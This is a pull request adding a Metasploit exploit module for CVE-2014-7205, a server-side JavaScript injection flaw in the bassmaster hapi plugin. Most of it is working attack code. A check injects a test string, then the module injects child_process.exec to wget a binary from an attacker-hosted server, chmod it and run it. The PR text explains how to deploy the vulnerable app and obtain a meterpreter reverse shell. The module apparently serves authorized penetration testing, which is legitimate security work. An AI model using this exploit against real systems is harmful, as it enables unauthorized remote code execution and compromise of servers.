### PR TITLE
Added Bassmaster batch Arbitrary JavaScript Injection Remote Code Exe…

### DIFF
--- a/modules/exploits/multi/http/bassmaster_js_injection.rb
+++ b/modules/exploits/multi/http/bassmaster_js_injection.rb
@@ -1,0 +1,168 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Bassmaster batch Arbitrary JavaScript Injection Remote Code Execution',
+      'Description'    => %q{
+        This module exploits an un-authenticated code injection vulnerability in the bassmaster
+        nodejs plugin for hapi. The vulnerability is within the batch endpoint and allows an
+        attacker to dynamically execute JavaScript code on the server side using an eval.
+
+        Note that the code uses a '\x2f' character so that we hit the match on the regex.
+      },
+      'Author'         =>
+        [
+          'mr_me <mr_me@offensive-security.com>',      # msf
+          'Jarda Kotěšovec'                            # original bug finder
+        ],
+      'References'  =>
+        [
+          [ 'CVE', '2014-7205'],
+          [ 'URL', 'https://nodesecurity.io/advisories/bassmaster_js_injection'],        # nodejs advisory
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'    => ['linux', 'bsd'],                                                 # binary > native JavaScript
+      'Arch'        => [ARCH_X86, ARCH_X86_64],
+      'Privileged'     => false,
+      'Targets'     =>
+        [
+          [ 'Bassmaster <= 1.5.1', {} ]                                                  # Other versions are also affected
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Nov 1 2016'))
+    register_options(
+      [
+        Opt::RPORT(8080),                                                                # default port for the examples/batch.js file
+        OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/batch"]), # default route for the examples/batch.js file
+        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
+      ], self.class)
+  end
+
+  def check
+
+    # So if we can append an encapsulated string into the body
+    # we know that we can execute arbitrary JavaScript code
+    rando  = rand_text_alpha(8+rand(8))
+    check  = "+'#{rando}'"
+
+    # testing
+    requests = [
+      {:method => "get", :path => "/profile"},
+      {:method => "get", :path => "/item"},
+      {:method => "get", :path => "/item/$1.id#{check}"}, # need to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g;
+    ]
+
+    post = {:requests => requests}
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(datastore['URIPATH']),
+      'ctype' => 'application/json',
+      'data'   => post.to_json
+    })
+
+    # default example app
+    if res and res.code == 200 and res.body =~ /#{rando}/
+      return CheckCode::Vulnerable
+
+    # non-default app
+    elsif res and res.code == 500 and res.body =~ /#{rando}/
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def on_request_uri(cli, request)
+    if (not @pl)
+      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    @elf_sent = true
+    send_response(cli, @pl)
+  end
+
+  def send_payload
+    @bd = rand_text_alpha(8+rand(8))
+    pn  = rand_text_alpha(8+rand(8))
+    register_file_for_cleanup("/tmp/#{@bd}")
+    cmd  = "wget #{@service_url} -O \\x2ftmp\\x2f#{@bd};"
+    cmd << "chmod 755 \\x2ftmp\\x2f#{@bd};"
+    cmd << "\\x2ftmp\\x2f#{@bd}"
+    pay = ";require('child_process').exec('#{cmd}');"
+
+    # pwning
+    requests = [
+      {:method => "get", :path => "/profile"},
+      {:method => "get", :path => "/item"},
+      {:method => "get", :path => "/item/$1.id#{pay}"}, # need to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g;
+    ]
+
+    post = {:requests => requests}
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(datastore['URIPATH']),
+      'ctype' => 'application/json',
+      'data'   => post.to_json
+    })
+
+    # default example app
+    if res and res.code == 200 and res.body =~ /id/
+      return true
+
+    # incase we are not targeting the default app
+    elsif res and res.code == 500 and es.body !=~ /id/
+      return true
+    end
+    return false
+  end
+
+  def start_http_server
+    @pl = generate_payload_exe
+    @elf_sent = false
+    downfile = rand_text_alpha(8+rand(8))
+    resource_uri = "\\x2f#{downfile}"
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
+    else
+      srv_host = datastore['SRVHOST']
+    end
+
+    # do not use SSL for the attacking web server
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+
+    @service_url = "http:\\x2f\\x2f#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
+    service_url_payload = srv_host + resource_uri
+    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => resource_uri
+    }})
+    datastore['SSL'] = true if ssl_restore
+    connect
+  end
+
+  def exploit
+      start_http_server
+      if send_payload
+        print_good("Injected payload")
+        # we need to delay, for the stager
+        select(nil, nil, nil, 5)
+      end
+  end
+end

--- a/modules/exploits/multi/http/bassmaster_js_injection.rb
+++ b/modules/exploits/multi/http/bassmaster_js_injection.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Bassmaster batch Arbitrary JavaScript Injection Remote Code Execution',
+      'Name'           => 'Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution',
       'Description'    => %q{
         This module exploits an un-authenticated code injection vulnerability in the bassmaster
         nodejs plugin for hapi. The vulnerability is within the batch endpoint and allows an
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         =>
         [
           'mr_me <mr_me@offensive-security.com>',      # msf
-          'Jarda Kotěšovec'                            # original bug finder
+          'Jarda Kotesovec'                            # original bug finder
         ],
       'References'  =>
         [


### PR DESCRIPTION
This is a module for the bassmaster batch arbitrary JavaScript injection remote code execution vulnerability. This module exploits an un-authenticated code injection vulnerability in the bassmaster nodejs plugin for hapi. 

The vulnerability is within the batch endpoint and allows an attacker to dynamically execute JavaScript code on the server side using an eval. It's a nice bug and if it lands, I believe its the first nodejs code injection bug to hit metasploit.

More (or less) details can be found on the nodesecurity advisory page: https://nodesecurity.io/advisories/bassmaster_js_injection
## Note

The module uses a '\x2f' character so that we hit the match on the regex, otherwise a raw '/' will fail for exploitation.
## Installation

On a fresh Debian install the following commands will download the vuln software and run it...
- [x] `apt-get install npm git -y`
- [x] `git clone https://github.com/hapijs/bassmaster`
- [x] `cd bassmaster`
- [x] `git checkout 83f02417beab924ce2fe6ee7d6fcfab11d2dafd5 .`
- [x] `npm install`
- [x] `nodejs examples/batch.js`
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/multi/http/bassmaster_js_injection`
- [x] `set payload linux/x86/meterpreter/reverse_tcp`
- [x] `set RHOST XXX.XXX.XXX.XXX`
- [x] `set LHOST XXX.XXX.XXX.XXX`
- [x] `check`
- [x] **Verify** that the target is vuln
- [x] `exploit`
- [x] **Verify** that you get a meterpreter shell

<img width="1221" alt="screen shot 2016-10-27 at 1 18 59 pm" src="https://cloud.githubusercontent.com/assets/1301421/19780267/05d8a0f8-9c4a-11e6-984f-a31882e3f945.png">
